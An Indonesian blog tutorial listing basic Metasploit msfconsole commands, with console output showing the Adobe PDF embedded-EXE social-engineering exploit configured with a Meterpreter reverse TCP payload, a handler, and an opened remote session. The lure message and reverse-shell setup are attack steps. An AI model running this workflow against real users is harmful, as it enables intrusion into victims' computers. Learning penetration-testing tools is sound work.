Setelah sebelumnya saya share tentang Perintah - Perintah dasar Meterpreter sekarang saya akan bagikan Perintah - Perintah dasar Metasploit (msfconsole). kebalik ya hehe, harusnya msfconsole dulu baru meterpreter, tapi gpp deh yang penting tetep sharing :D.

Oke, di bawah ini merupakan beberapa perintah dari msfconsole yang dapat digunakan

msfconsole
Perintah untuk memulai menjalankan msfconsole
msfconsole
banner
Perintah ini digunakan untuk memilih secara acak logo metasploit yang akan di tampilkan
msf > banner

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
db_status
Perintah ini digunakan untuk mengecek koneksi database postgresql
msf > db_status
[*] postgresql connected to msf
msf > 
show exploit
Perintah ini digunakan untuk melihat semua exploit yang ada di metasploit
msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/local/ibstat_path                                          2013-09-24       excellent  ibstat $PATH Privilege Escalation
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
show payloads
Perintah ini digunakan untuk melihat semua payload yang ada
msf > show payloads

Payloads
========

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                               normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                              normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                               normal  AIX execve Shell for inetd
   aix/ppc/shell_reverse_tcp                                            normal  AIX Command Shell, Reverse TCP Inline
show auxiliary
Perintah ini digunakan untuk menampilkan semua module auxiliary
msf > show auxiliary

Auxiliary
=========

   Name                                                           Disclosure Date  Rank    Description
   ----                                                           ---------------  ----    -----------
   admin/2wire/xslt_password_reset                                2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
   admin/android/google_play_store_uxss_xframe_rce                                 normal  Android Browser RCE Through Google Play Store XFO
   admin/appletv/appletv_display_image                                             normal  Apple TV Image Remote Control
   admin/appletv/appletv_display_video                                             normal  Apple TV Video Remote Control
search name
Perintah ini digunakan untuk mencari sebuah exploit atau module yang disebutkan
msf > search pdf_embedded

Matching Modules
================

   Name                                                    Disclosure Date  Rank       Description
   ----                                                    ---------------  ----       -----------
   exploit/windows/fileformat/adobe_pdf_embedded_exe       2010-03-29       excellent  Adobe PDF Embedded EXE Social Engineering
   exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs  2010-03-29       excellent  Adobe PDF Escape EXE Social Engineering (No JavaScript)


msf > 
use
Perintah ini digunakan untuk menentukan module exploit yang akan digunakan
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > 
set payload
Perintah ini untuk menentukan payload yang akan digunakan
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > 
show targets
Perintah ini digunakan untuk melihat platform target yang dapat diserang dengan exploit yang digunakan
msf exploit(adobe_pdf_embedded_exe) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)


msf exploit(adobe_pdf_embedded_exe) > 
show options
Perintah ini digunakan melihat pilihan yang tersedia untuk module atau exploit
msf exploit(adobe_pdf_embedded_exe_nojs) > show options

Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs):

   Name            Current Setting                                                                                     Required  Description
   ----            ---------------                                                                                     --------  -----------
   EXENAME         msf.exe                                                                                             no        The Name of payload exe.
   FILENAME        evil.pdf                                                                                            no        The output filename.
   LAUNCH_MESSAGE  To view the encrypted content please tick the "Do not show this message again" box and press Open.  no        The message to display in the File: area


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader <= v9.3.3 (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe_nojs) > 
back
Perintah ini digunakan untuk kembali dari konteks saat ini
msf exploit(adobe_pdf_embedded_exe) > back
msf > 
set LHOST
Perintah ini digunakan untuk mengatur IP Attacker, bisa menggunakan IP Lokal atau IP Publik (tergantung kondisi )
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.100
lhost => 192.168.1.100
msf exploit(adobe_pdf_embedded_exe) > 
set LPORT
Perintah ini digunakan untuk mengatur port lintener
msf exploit(adobe_pdf_embedded_exe) > set LPORT 443
LPORT => 443
msf exploit(adobe_pdf_embedded_exe) > 
set RHOST
Perintah ini digunakan untuk menentukan IP Target, (biasa digunakan untuk jenis exploit tertentu)
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
unset
Kebalikan dari set perintah ini digunakan untuk membatalkan atau menghapus parameter yang sebelumnya di atur, kita juga dapat menghapus semua variabel dengan perintah 'unset all'
msf exploit(handler) > unset payload android/meterpreter/reverse_tcp
Unsetting payload...
Unsetting android/meterpreter/reverse_tcp...
msf exploit(handler) > unset all
Flushing datastore...
msf exploit(handler) > 
save
Kita juga dapat menyimpan semua setting yang telah di tetapkan,dan semua akan dimuat ketika startup(saat msfconsole di buka) tanpa mengetur semuanya lagi dari awal.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > save
Saved configuration to: /root/.msf4/config
msf exploit(handler) > 
exploit
Perintah ini digunakan mengeksekusi module exploit dan menyerang target
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.100:443 
[*] Starting the payload handler...
exploit -j
Perintah ini digunakan mengeksekusi module exploit dan menyerang target sekaligus bejalan sebagai background
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:443 
[*] Starting the payload handler...
msf exploit(handler) > 
exploit -z
Hampir sama dengan exploit -j, ini tidak berinteraksi dengan sesi meterpreter ketika exploitasi suskses(otomatis bejalan sebagai background jika exploitasi sukses)
msf exploit(handler) > exploit -z

[*] Started reverse handler on 192.168.1.100:443 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.100:443 -> 192.168.1.103:49272) at 2016-03-02 00:26:39 +0700
[*] Session 1 created in the background.
msf exploit(handler) > 
sessions -l
Perintah ini digunakan untuk melihat list sesi meterpreter yang sedang aktif (berjalan sebagai background)
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  2   meterpreter x86/win32  SAMSUNG\SAMSUNG @ SAMSUNG  192.168.1.100:443 -> 192.168.1.103:49207 (192.168.1.103)

msf exploit(handler) > 
sessions -i ID
Perintah ini digunakan untuk berinteraksi kembali dengan sesi meterpreter yang sedang berjalan sebagai background
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 
sessions -K
Perintah ini digunakan untuk mematikan semua sesi meterpreter yang sedang aktif
msf exploit(handler) > sessions -K
[*] Killing all sessions...
[*] 192.168.1.103 - Meterpreter session 2 closed.
msf exploit(handler) > 
help
Perintah ini digunakan untuk melihat perintah-perintah dan deskripsi yang dapat digunakan pada msfconsole
msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    edit          Edit the current module with $VISUAL or $EDITOR
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    go_pro        Launch Metasploit web GUI
    grep          Grep the output of another command
    help          Help menu
Itulah beberapa contoh Perintah - Perintah dasar dari msfconsole, mohon maaf apabila ada bebrapa perintah yang masih kurang. semoga bermanfaat.
sumber https://www.offensive-security.com

Posting Komentar

  1. kk suhu itu pada perintah save,cara memanggil file yang di save itu gimana yaa..?

    BalasHapus

 
Top